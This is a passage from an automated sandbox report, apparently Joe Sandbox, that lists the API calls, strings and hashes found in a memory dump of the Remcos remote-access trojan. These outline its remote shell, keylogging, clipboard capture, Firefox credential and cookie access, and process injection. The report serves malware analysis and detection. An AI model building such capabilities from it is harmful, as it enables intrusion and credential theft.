                                                                              • Instruction ID: 9c65b6197a0e8ce5e429e224625e4c370c9a1848c9e97f9a588a6d75e163472b
                                                                              • Opcode Fuzzy Hash: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                              • Instruction Fuzzy Hash: 4ED05B326406216FB310575D6D01FFBB5DCDFA67617150077F408D7110D6945D82C3AD

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1212 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                                              APIs
                                                                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                              • GetLastError.KERNEL32 ref: 0040BEF1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateErrorLastMutex
                                                                              • String ID: (CG
                                                                              • API String ID: 1925916568-4210230975
                                                                              • Opcode ID: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                              • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                              • Opcode Fuzzy Hash: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                              • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1215 412513-41253f RegOpenKeyExA 1216 412541-412567 RegQueryValueExA RegCloseKey 1215->1216 1217 412572 1215->1217 1216->1217 1218 412569-412570 1216->1218 1219 412577-412583 call 401f66 1217->1219 1218->1219
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                              • RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3677997916-0
                                                                              • Opcode ID: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
                                                                              • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                              • Opcode Fuzzy Hash: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
                                                                              • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                              • RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3677997916-0
                                                                              • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                              • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                              • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                              • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                              • RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3677997916-0
                                                                              • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                              • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                              • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                              • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _wcslen
                                                                              • String ID: xAG
                                                                              • API String ID: 176396367-2759412365
                                                                              • Opcode ID: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                                                                              • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                                              • Opcode Fuzzy Hash: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                                                                              • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                                              APIs
                                                                              • _free.LIBCMT ref: 0044B9DF
                                                                                • Part of subcall function 00446AFF: HeapAlloc.KERNEL32(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                              • RtlReAllocateHeap.NTDLL(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Heap$AllocAllocate_free
                                                                              • String ID:
                                                                              • API String ID: 2447670028-0
                                                                              • Opcode ID: 562d4c1fddf21a80c38cfe2e0300bdc28a7a71d666f3b820161c9f5a7c2f7eb0
                                                                              • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                                                                              • Opcode Fuzzy Hash: 562d4c1fddf21a80c38cfe2e0300bdc28a7a71d666f3b820161c9f5a7c2f7eb0
                                                                              • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                                                                              APIs
                                                                              • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Startup
                                                                              • String ID:
                                                                              • API String ID: 724789610-0
                                                                              • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                              • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                              • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                              • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: send
                                                                              • String ID:
                                                                              • API String ID: 2809346765-0
                                                                              • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                              • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                              • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                              • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                              APIs
                                                                              • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                              • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                              • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                              • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                              • API String ID: 2918587301-599666313
                                                                              • Opcode ID: 31bfcebef587b1b6e9556c7ff3150c16f0baeace92f9e39076f94835df6a3e2d
                                                                              • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                              • Opcode Fuzzy Hash: 31bfcebef587b1b6e9556c7ff3150c16f0baeace92f9e39076f94835df6a3e2d
                                                                              • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                              APIs
                                                                              • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                              • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                              • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                              • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                              • CloseHandle.KERNEL32 ref: 004053CD
                                                                              • CloseHandle.KERNEL32 ref: 004053D5
                                                                              • CloseHandle.KERNEL32 ref: 004053E7
                                                                              • CloseHandle.KERNEL32 ref: 004053EF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                              • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                              • API String ID: 3815868655-81343324
                                                                              • Opcode ID: 10bf4400830cdb0a291db3b4d609ad2669c0122a6ef6b5deed25f3618e732387
                                                                              • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                              • Opcode Fuzzy Hash: 10bf4400830cdb0a291db3b4d609ad2669c0122a6ef6b5deed25f3618e732387
                                                                              • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                              • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                              • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                              • API String ID: 65172268-860466531
                                                                              • Opcode ID: 639bfacccf61b4a7a246b99b22c6bb3c911c191bbe166e2da80c33d4b188edd7
                                                                              • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                              • Opcode Fuzzy Hash: 639bfacccf61b4a7a246b99b22c6bb3c911c191bbe166e2da80c33d4b188edd7
                                                                              • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                              • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                              • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Find$CloseFile$FirstNext
                                                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                              • API String ID: 1164774033-3681987949
                                                                              • Opcode ID: 2316961ae5f52f31cc477e1d09f773a4a7350a98b7632d2531bc2c7add8855b4
                                                                              • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                              • Opcode Fuzzy Hash: 2316961ae5f52f31cc477e1d09f773a4a7350a98b7632d2531bc2c7add8855b4
                                                                              • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                              • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Find$Close$File$FirstNext
                                                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                              • API String ID: 3527384056-432212279
                                                                              • Opcode ID: 6413a42ae19e7c89ed42c643cb52caeedd1e1ba2e9febfa8c5afa48b91d55771
                                                                              • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                              • Opcode Fuzzy Hash: 6413a42ae19e7c89ed42c643cb52caeedd1e1ba2e9febfa8c5afa48b91d55771
                                                                              • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                              • API String ID: 726551946-3025026198
                                                                              • Opcode ID: 72761ffefe35e3790d33003bddd1b3aca3f5aeffe8a7e6c700e9af830a7ff8c7
                                                                              • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                              • Opcode Fuzzy Hash: 72761ffefe35e3790d33003bddd1b3aca3f5aeffe8a7e6c700e9af830a7ff8c7
                                                                              • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                              APIs
                                                                              • OpenClipboard.USER32 ref: 004159C7
                                                                              • EmptyClipboard.USER32 ref: 004159D5
                                                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                              • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                              • CloseClipboard.USER32 ref: 00415A5A
                                                                              • OpenClipboard.USER32 ref: 00415A61
                                                                              • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                              • CloseClipboard.USER32 ref: 00415A89
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                              • String ID:
                                                                              • API String ID: 3520204547-0
                                                                              • Opcode ID: 8a84b0237ca338e1a3ed05f80deb3638e9beb60abd9708b2ae7a1dceee0212da
                                                                              • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                              • Opcode Fuzzy Hash: 8a84b0237ca338e1a3ed05f80deb3638e9beb60abd9708b2ae7a1dceee0212da
                                                                              • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0$1$2$3$4$5$6$7
                                                                              • API String ID: 0-3177665633
                                                                              • Opcode ID: a67fb25c249552ee9189d14a7b82946051c82c8a43c29b1558aee354ad113b8a
                                                                              • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                              • Opcode Fuzzy Hash: a67fb25c249552ee9189d14a7b82946051c82c8a43c29b1558aee354ad113b8a
                                                                              • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 00409B3F
                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                              • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                              • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                              • GetKeyboardState.USER32(?), ref: 00409B67
                                                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                              • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                              • String ID: 8[G
                                                                              • API String ID: 1888522110-1691237782
                                                                              • Opcode ID: 62c4c2556f5e099e9a9792d70b860f0f67bc178eac4334f9f50af38fee2ec64e
                                                                              • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                              • Opcode Fuzzy Hash: 62c4c2556f5e099e9a9792d70b860f0f67bc178eac4334f9f50af38fee2ec64e
                                                                              • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00406788
                                                                              • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
